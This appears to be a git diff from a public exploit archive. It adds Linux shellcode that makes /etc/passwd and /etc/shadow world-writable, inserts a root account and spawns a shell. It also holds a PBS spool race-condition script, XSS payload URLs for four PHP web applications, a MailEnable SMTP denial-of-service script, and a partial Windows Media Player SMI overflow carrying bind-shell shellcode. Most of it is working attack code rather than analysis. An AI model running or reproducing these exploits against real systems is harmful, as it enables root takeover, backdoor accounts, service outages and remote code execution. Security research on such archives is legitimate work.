+jobid=$(($jobid+1))
+if [ ! $jobid -ge 0 ]; then echo "Cannot determine next job ID!";exit 1;fi
+echo Next job ID will be $jobid
+hostname=`echo $jobname | cut -d . -f 2`
+echo Running racer...submit job as different user, than push Ctrl+C after while.
+ssh $host -- \(/tmp/racer.x /tmp/pbs_test_by_bartol /var/spool/pbs/spool/${jobid}.${hostname}.OU \)
+ssh $host -- killall racer.x
+echo /var/spool/pbs/spool on $host content:
+ssh $host -- ls -latr /var/spool/pbs/spool
+echo Cleaning up...
+ssh $host -- unlink /var/spool/pbs/spool/${jobid}.${hostname}.OU
+ssh $host -- ls -latr /var/spool/pbs/spool
+ssh $host --  rm -v /tmp/racer.x
+rm -v racer.x
+
+
+
+
diff --git a/platforms/linux/shellcode/34262.c b/platforms/linux/shellcode/34262.c
new file mode 100755
index 000000000..c2cb1394d
--- /dev/null
+++ b/platforms/linux/shellcode/34262.c
@@ -0,0 +1,144 @@
+/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh 
+# Date: 4/8/2014
+# Exploit Author: Ali Razmjoo
+# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
+*/
+/*
+Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
+Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh 
+length: 378 bytes
+chmod('/etc/passwd',777)
+chmod('/etc/shadow',777)
+open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
+setreuid() , execve('/bin/sh')
+
+
+00000000 <_start>:
+   0:	31 c0                	xor    %eax,%eax
+   2:	31 db                	xor    %ebx,%ebx
+   4:	6a 0f                	push   $0xf
+   6:	58                   	pop    %eax
+   7:	68 6a 73 77 64       	push   $0x6477736a
+   c:	5b                   	pop    %ebx
+   d:	c1 eb 08             	shr    $0x8,%ebx
+  10:	53                   	push   %ebx
+  11:	68 2f 70 61 73       	push   $0x7361702f
+  16:	68 2f 65 74 63       	push   $0x6374652f
+  1b:	89 e3                	mov    %esp,%ebx
+  1d:	68 41 41 ff 01       	push   $0x1ff4141
+  22:	59                   	pop    %ecx
+  23:	c1 e9 08             	shr    $0x8,%ecx
+  26:	c1 e9 08             	shr    $0x8,%ecx
+  29:	cd 80                	int    $0x80
+  2b:	6a 0f                	push   $0xf
+  2d:	58                   	pop    %eax
+  2e:	68 6a 64 6f 77       	push   $0x776f646a
+  33:	5b                   	pop    %ebx
+  34:	c1 eb 08             	shr    $0x8,%ebx
+  37:	53                   	push   %ebx
+  38:	68 2f 73 68 61       	push   $0x6168732f
+  3d:	68 2f 65 74 63       	push   $0x6374652f
+  42:	89 e3                	mov    %esp,%ebx
+  44:	68 41 41 ff 01       	push   $0x1ff4141
+  49:	59                   	pop    %ecx
+  4a:	c1 e9 08             	shr    $0x8,%ecx
+  4d:	c1 e9 08             	shr    $0x8,%ecx
+  50:	cd 80                	int    $0x80
+  52:	6a 05                	push   $0x5
+  54:	58                   	pop    %eax
+  55:	68 41 73 77 64       	push   $0x64777341
+  5a:	5b                   	pop    %ebx
+  5b:	c1 eb 08             	shr    $0x8,%ebx
+  5e:	53                   	push   %ebx
+  5f:	68 2f 70 61 73       	push   $0x7361702f
+  64:	68 2f 65 74 63       	push   $0x6374652f
+  69:	89 e3                	mov    %esp,%ebx
+  6b:	68 41 41 01 04       	push   $0x4014141
+  70:	59                   	pop    %ecx
+  71:	c1 e9 08             	shr    $0x8,%ecx
+  74:	c1 e9 08             	shr    $0x8,%ecx
+  77:	cd 80                	int    $0x80
+  79:	89 c3                	mov    %eax,%ebx
+  7b:	6a 04                	push   $0x4
+  7d:	58                   	pop    %eax
+  7e:	68 41 73 68 0a       	push   $0xa687341
+  83:	59                   	pop    %ecx
+  84:	c1 e9 08             	shr    $0x8,%ecx
+  87:	51                   	push   %ecx
+  88:	68 6e 2f 62 61       	push   $0x61622f6e
+  8d:	68 3a 2f 62 69       	push   $0x69622f3a
+  92:	68 72 6f 6f 74       	push   $0x746f6f72
+  97:	68 4c 49 3a 2f       	push   $0x2f3a494c
+  9c:	68 3a 30 3a 41       	push   $0x413a303a
+  a1:	68 4b 2e 3a 30       	push   $0x303a2e4b
+  a6:	68 66 77 55 57       	push   $0x57557766
+  ab:	68 68 70 31 50       	push   $0x50317068
+  b0:	68 7a 59 65 41       	push   $0x4165597a
+  b5:	68 41 61 41 51       	push   $0x51416141
+  ba:	68 49 38 75 74       	push   $0x74753849
+  bf:	68 50 4d 59 68       	push   $0x68594d50
+  c4:	68 54 42 74 7a       	push   $0x7a744254
+  c9:	68 51 2f 38 54       	push   $0x54382f51
+  ce:	68 45 36 6d 67       	push   $0x676d3645
+  d3:	68 76 50 2e 73       	push   $0x732e5076
+  d8:	68 4e 58 52 37       	push   $0x3752584e
+  dd:	68 39 4b 55 48       	push   $0x48554b39
+  e2:	68 72 2f 59 42       	push   $0x42592f72
+  e7:	68 56 78 4b 47       	push   $0x474b7856
+  ec:	68 39 55 66 5a       	push   $0x5a665539
+  f1:	68 46 56 6a 68       	push   $0x686a5646
+  f6:	68 46 63 38 79       	push   $0x79386346
+  fb:	68 70 59 6a 71       	push   $0x716a5970
+ 100:	68 77 69 53 68       	push   $0x68536977
+ 105:	68 6e 54 67 54       	push   $0x5467546e
+ 10a:	68 58 4d 69 37       	push   $0x37694d58
+ 10f:	68 2f 41 6e 24       	push   $0x246e412f
+ 114:	68 70 55 6e 4d       	push   $0x4d6e5570
+ 119:	68 24 36 24 6a       	push   $0x6a243624
+ 11e:	68 41 4c 49 3a       	push   $0x3a494c41
+ 123:	89 e1                	mov    %esp,%ecx
+ 125:	ba 41 41 41 7f       	mov    $0x7f414141,%edx
+ 12a:	c1 ea 08             	shr    $0x8,%edx
+ 12d:	c1 ea 08             	shr    $0x8,%edx
+ 130:	c1 ea 08             	shr    $0x8,%edx
+ 133:	cd 80                	int    $0x80
+ 135:	31 c0                	xor    %eax,%eax
+ 137:	b0 46                	mov    $0x46,%al
+ 139:	31 db                	xor    %ebx,%ebx
+ 13b:	31 c9                	xor    %ecx,%ecx
+ 13d:	cd 80                	int    $0x80
+ 13f:	31 c0                	xor    %eax,%eax
+ 141:	b0 46                	mov    $0x46,%al
+ 143:	31 db                	xor    %ebx,%ebx
+ 145:	31 c9                	xor    %ecx,%ecx
+ 147:	cd 80                	int    $0x80
+ 149:	68 59 59 59 59       	push   $0x59595959
+ 14e:	68 58 58 58 58       	push   $0x58585858
+ 153:	68 2f 73 68 42       	push   $0x4268732f
+ 158:	68 2f 62 69 6e       	push   $0x6e69622f
+ 15d:	89 e3                	mov    %esp,%ebx
+ 15f:	31 c0                	xor    %eax,%eax
+ 161:	88 43 07             	mov    %al,0x7(%ebx)
+ 164:	89 5b 08             	mov    %ebx,0x8(%ebx)
+ 167:	89 43 0c             	mov    %eax,0xc(%ebx)
+ 16a:	b0 0b                	mov    $0xb,%al
+ 16c:	8d 4b 08             	lea    0x8(%ebx),%ecx
+ 16f:	8d 53 0c             	lea    0xc(%ebx),%edx
+ 172:	cd 80                	int    $0x80
+ 174:	b0 01                	mov    $0x1,%al
+ 176:	b3 01                	mov    $0x1,%bl
+ 178:	cd 80                	int    $0x80
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+char sc[] = "\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
+int main(void)
+{
+
+    fprintf(stdout,"Length: %d\n\n",strlen(sc));
+
+    (*(void(*)()) sc)();
+
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/34265.txt b/platforms/php/webapps/34265.txt
new file mode 100755
index 000000000..459564e1f
--- /dev/null
+++ b/platforms/php/webapps/34265.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41447/info
+
+Exponent CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Exponent 0.97.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/slideshowmodule/slideshow.js.php?u=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34266.txt b/platforms/php/webapps/34266.txt
new file mode 100755
index 000000000..8ce960b07
--- /dev/null
+++ b/platforms/php/webapps/34266.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/41448/info
+
+RunCms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+RunCms 2.1 is vulnerable; other versions may also be affected. 
+
+The following example request is available:
+
+wget --user-agent="
+" http://www.example.com/modules/forum/check.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/34268.txt b/platforms/php/webapps/34268.txt
new file mode 100755
index 000000000..f78803cf8
--- /dev/null
+++ b/platforms/php/webapps/34268.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/41453/info
+
+Worxware DCP-Portal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DCP-Portal 7.0 Beta is vulnerable; other versions may also be affected. 
+
+http://www.example.com/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
+http://www.example.com/modules/gallery/view_img.php?imagename=%22&#039;);window.alert(&#039;XSS&#039;);document.write(&#039;%22
+http://www.example.com/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
diff --git a/platforms/php/webapps/34269.txt b/platforms/php/webapps/34269.txt
new file mode 100755
index 000000000..97be1d203
--- /dev/null
+++ b/platforms/php/webapps/34269.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41456/info
+
+Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Pligg 1.0.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E
+http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E
+
diff --git a/platforms/windows/dos/5235.py b/platforms/windows/dos/5235.py
index fa3aa5503..874207672 100755
--- a/platforms/windows/dos/5235.py
+++ b/platforms/windows/dos/5235.py
@@ -1,93 +1,93 @@
-#!/usr/bin/python
-##########################################################################
-#
-# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS ) 
-# Bug discovered by Matteo Memelli aka ryujin 
-# http://www.gray-world.net http://www.be4mind.com
-#
-# Affected Versions : Standard Edition all versions
-#                     Professional Edition all versions
-#                     Enterprise Edition all versions
-# Tested on OS      : Windows 2000 SP4 English
-#                     Windows 2003 Standard Edition Italian
-#                     Windows XP SP2 English
-# Discovery Date               : 02/24/2008
-# Initial vendor notification  : 03/06/2008
-# Coordinated public disclosure: 03/11/2008
-#
-# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
-#
-#-------------------------------------------------------------------------
-#
-# THX TO muts at offensive-security.com : 
-# I'll promise you: next time i'll find an easier one and get my shell :P
-#
-#-------------------------------------------------------------------------
-##########################################################################
-#
-# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
-# [+] Connecting to 192.168.1.245 on port 25
-# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
-# 03/06/08 13:20:49
-#
-# [+] Sending evilbuffer...
-# [+] Waiting 10 secs before reconnecting...
-# [+] Reconnecting...
-# [+] SMTP Server died!
-# [+] Connection refused
-#
-##########################################################################
- 
-from socket import *
-from optparse import OptionParser
-import sys, time
-
-usage =  "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
-parser = OptionParser(usage=usage)
-parser.add_option("-H", "--target_host", type="string",
-                  action="store", dest="HOST",
-                  help="Target Host")
-parser.add_option("-P", "--target_port", type="int",
-                  action="store", dest="PORT",
-                  help="Target Port")
-parser.add_option("-c", "--command", type="string",
-                  action="store", dest="COMMAND",
-                  help="Command: VRFY or EXPN ; defualt VRFY")
-(options, args) = parser.parse_args()
-HOST    = options.HOST
-PORT    = options.PORT
-COMMAND = options.COMMAND
-if not (HOST and PORT):
-   parser.print_help()
-   sys.exit()
-if not COMMAND:
-   COMMAND = 'VRFY'
-   print "[+] Using default command VRFY"
-else:
-   COMMAND = COMMAND.upper().strip()
-   if COMMAND != 'VRFY' and COMMAND != 'EXPN':
-      print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
-      sys.exit()
-evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
-s = socket(AF_INET, SOCK_STREAM)
-s.connect((HOST, PORT))
-print "[+] Connecting to %s on port %d" % (HOST, PORT)
-print s.recv(1024)
-print "[+] Sending evilbuffer..."
-s.send(evilbuf)
-s.close()
-print "[+] Waiting 10 secs before reconnecting..."
-time.sleep(10)
-try:
-   s = socket(AF_INET, SOCK_STREAM)
-   print "[+] Reconnecting..."
-   s.connect((HOST, PORT))
-except error, e:
-   print "[+] SMTP Server died!"
-   print "[+] %s" % e[1]
-else:
-   print "[-] SMTP Server is still up"
-   print "[-] This probably means that is not vulnerable"
-   s.close()
-
-# milw0rm.com [2008-03-11]
+#!/usr/bin/python
+##########################################################################
+#
+# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS ) 
+# Bug discovered by Matteo Memelli aka ryujin 
+# http://www.gray-world.net http://www.be4mind.com
+#
+# Affected Versions : Standard Edition all versions
+#                     Professional Edition all versions
+#                     Enterprise Edition all versions
+# Tested on OS      : Windows 2000 SP4 English
+#                     Windows 2003 Standard Edition Italian
+#                     Windows XP SP2 English
+# Discovery Date               : 02/24/2008
+# Initial vendor notification  : 03/06/2008
+# Coordinated public disclosure: 03/11/2008
+#
+# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
+#
+#-------------------------------------------------------------------------
+#
+# THX TO muts at offensive-security.com : 
+# I'll promise you: next time i'll find an easier one and get my shell :P
+#
+#-------------------------------------------------------------------------
+##########################################################################
+#
+# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
+# [+] Connecting to 192.168.1.245 on port 25
+# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
+# 03/06/08 13:20:49
+#
+# [+] Sending evilbuffer...
+# [+] Waiting 10 secs before reconnecting...
+# [+] Reconnecting...
+# [+] SMTP Server died!
+# [+] Connection refused
+#
+##########################################################################
+ 
+from socket import *
+from optparse import OptionParser
+import sys, time
+
+usage =  "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
+parser = OptionParser(usage=usage)
+parser.add_option("-H", "--target_host", type="string",
+                  action="store", dest="HOST",
+                  help="Target Host")
+parser.add_option("-P", "--target_port", type="int",
+                  action="store", dest="PORT",
+                  help="Target Port")
+parser.add_option("-c", "--command", type="string",
+                  action="store", dest="COMMAND",
+                  help="Command: VRFY or EXPN ; defualt VRFY")
+(options, args) = parser.parse_args()
+HOST    = options.HOST
+PORT    = options.PORT
+COMMAND = options.COMMAND
+if not (HOST and PORT):
+   parser.print_help()
+   sys.exit()
+if not COMMAND:
+   COMMAND = 'VRFY'
+   print "[+] Using default command VRFY"
+else:
+   COMMAND = COMMAND.upper().strip()
+   if COMMAND != 'VRFY' and COMMAND != 'EXPN':
+      print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
+      sys.exit()
+evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((HOST, PORT))
+print "[+] Connecting to %s on port %d" % (HOST, PORT)
+print s.recv(1024)
+print "[+] Sending evilbuffer..."
+s.send(evilbuf)
+s.close()
+print "[+] Waiting 10 secs before reconnecting..."
+time.sleep(10)
+try:
+   s = socket(AF_INET, SOCK_STREAM)
+   print "[+] Reconnecting..."
+   s.connect((HOST, PORT))
+except error, e:
+   print "[+] SMTP Server died!"
+   print "[+] %s" % e[1]
+else:
+   print "[-] SMTP Server is still up"
+   print "[-] This probably means that is not vulnerable"
+   s.close()
+
+# milw0rm.com [2008-03-11]
diff --git a/platforms/windows/remote/4866.py b/platforms/windows/remote/4866.py
index 60742b4e6..159d17bd2 100755
--- a/platforms/windows/remote/4866.py
+++ b/platforms/windows/remote/4866.py
@@ -1,118 +1,118 @@
-#!/usr/bin/python
-##########################################################################
-# Bug discovered by Jun Mao of VeriSign iDefense 
-# http://www.securityfocus.com/bid/26789
-# CVE-2007-3901
-# Coded by Matteo Memelli aka ryujin
-# http://www.gray-world.net http://www.be4mind.com
-# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) 
-#------------------------------------------------------------------------
-# THX TO all the guys at www.offensive-security.com
-# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! 
-# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
-#------------------------------------------------------------------------
-##########################################################################  
-# On Windows Media Player Open---> http://attacker/anyfile.smi
-# .smi extension is necessary, filename can be anything.
-#  
-# badrobot:/home/matte# ./mplayer.py 
-# [+] Listening on port 80
-# [+] Connection accepted from: 192.168.1.243
-# [+] Payload sent, check your shell on 192.168.1.243 port 4444
-# badrobot:/home/matte# nc 192.168.1.243 4444
-# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
-#
-# C:\Documents and Settings\ryujin\Desktop>ipconfig
-# ipconfig
-#
-# Windows 2000 IP Configuration
-#
-# Ethernet adapter Local Area Connection:
-#
-#        Connection-specific DNS Suffix  . : 
-#        IP Address. . . . . . . . . . . . : 192.168.1.243
-#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
-#        Default Gateway . . . . . . . . . : 
-#
-# C:\Documents and Settings\ryujin\Desktop>
-##########################################################################
- 
-from socket import *
-
-# SMI BODY
-body = """<SAMI>
-<HEAD>
-<STYLE TYPE="text/css">
-<!--
-P {
-font-size: 1em;
-font-family: Arial;
-font-weight: normal;
-color: #FFFFFF;
-background: #000000;
-text-align: center;
-padding-left: 5px;
-padding-right: 5px;
-padding-bottom: 2px;
-}
-.ENUSCC { Name: English; lang: EN-US-CC; }
--->
-</STYLE>
-</HEAD>
-<BODY>
-<SYNC Start="0" pippo=\""""
-
-# Metasploit bind shell on port 4444 EXITFUNC seh
-shellcode = (
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
-"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
-"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
-)
-
-body += 21988*'A'                                 
-body += '\x90'*16                                 # NOP Slide
-body += shellcode + 'C'*67                        # to SEH... 
-body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77'        # ShortJmp, and SEH overwrite
-body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
-body += 143505*'E' + '">'
-body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
-
-# RESPONSE HEADER 
-header = (
-'HTTP/1.1 200 OK\r\n'
-'Content-Type: application/smil\r\n'
-'\r\n'
-)
-
-evilbuf = header + body
-s = socket(AF_INET, SOCK_STREAM)
-s.bind(("0.0.0.0", 80))
-s.listen(1)
-print "[+] Listening on port 80"
-c, addr = s.accept()
-print "[+] Connection accepted from: %s" % (addr[0])
-c.recv(1024)
-c.send(evilbuf)
-print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
-c.close()
-s.close()
-
-# milw0rm.com [2008-01-08]
+#!/usr/bin/python
+##########################################################################
+# Bug discovered by Jun Mao of VeriSign iDefense 
+# http://www.securityfocus.com/bid/26789
+# CVE-2007-3901
+# Coded by Matteo Memelli aka ryujin
+# http://www.gray-world.net http://www.be4mind.com
+# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) 
+#------------------------------------------------------------------------
+# THX TO all the guys at www.offensive-security.com
+# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! 
+# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
+#------------------------------------------------------------------------
+##########################################################################  
+# On Windows Media Player Open---> http://attacker/anyfile.smi
+# .smi extension is necessary, filename can be anything.
+#  
+# badrobot:/home/matte# ./mplayer.py 
+# [+] Listening on port 80
+# [+] Connection accepted from: 192.168.1.243
+# [+] Payload sent, check your shell on 192.168.1.243 port 4444
+# badrobot:/home/matte# nc 192.168.1.243 4444
+# Microsoft Windows 2000 [Version 5.00.2195]
+# (C) Copyright 1985-2000 Microsoft Corp.
+#
+# C:\Documents and Settings\ryujin\Desktop>ipconfig
+# ipconfig
+#
+# Windows 2000 IP Configuration
+#
+# Ethernet adapter Local Area Connection:
+#
+#        Connection-specific DNS Suffix  . : 
+#        IP Address. . . . . . . . . . . . : 192.168.1.243
+#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
+#        Default Gateway . . . . . . . . . : 
+#
+# C:\Documents and Settings\ryujin\Desktop>
+##########################################################################
+ 
+from socket import *
+
+# SMI BODY
+body = """<SAMI>
+<HEAD>
+<STYLE TYPE="text/css">
+<!--
+P {
+font-size: 1em;
+font-family: Arial;
+font-weight: normal;
+color: #FFFFFF;
+background: #000000;
+text-align: center;
+padding-left: 5px;
+padding-right: 5px;
+padding-bottom: 2px;
+}
+.ENUSCC { Name: English; lang: EN-US-CC; }
+-->
+</STYLE>
+</HEAD>
+<BODY>
+<SYNC Start="0" pippo=\""""
+
+# Metasploit bind shell on port 4444 EXITFUNC seh
+shellcode = (
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
+"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
+"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
+)
+
+body += 21988*'A'                                 
+body += '\x90'*16                                 # NOP Slide
+body += shellcode + 'C'*67                        # to SEH... 
